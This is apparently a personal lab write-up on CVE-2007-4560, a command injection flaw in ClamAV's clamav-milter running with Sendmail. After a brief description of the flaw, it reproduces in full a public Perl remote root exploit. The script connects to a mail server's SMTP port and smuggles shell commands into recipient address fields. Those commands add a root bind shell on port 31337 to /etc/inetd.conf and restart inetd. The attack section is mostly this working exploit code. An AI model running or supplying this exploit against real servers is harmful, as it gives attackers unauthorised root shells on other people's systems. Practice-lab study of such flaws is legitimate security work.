CVE-2007-4560
/Practice/ClamAV/3-Exploitation/attachments/{DA81655F-35AF-49BE-A8C9-9B9CC4A36EA4}.png)
A vulnerability classified as very critical has been found in SourceFire ClamAV 0.91.1 (Anti-Malware Software). Affected is an unknown part. The manipulation with an unknown input leads to a os command injection vulnerability. CWE is classifying the issue as CWE-78. The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.
Exploit
/Practice/ClamAV/3-Exploitation/attachments/{4095E8C5-F04B-441A-9CA2-20FB08C32249}.png)
Further looking it up online reveals that the vulnerability exists in lack of input validation for special character leading to code execution
While there are many exploits available publicly, I’ll be using the Perl script
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]
It works by sending a mail with the payload in the address field, and the payload being a bind shell on port 31337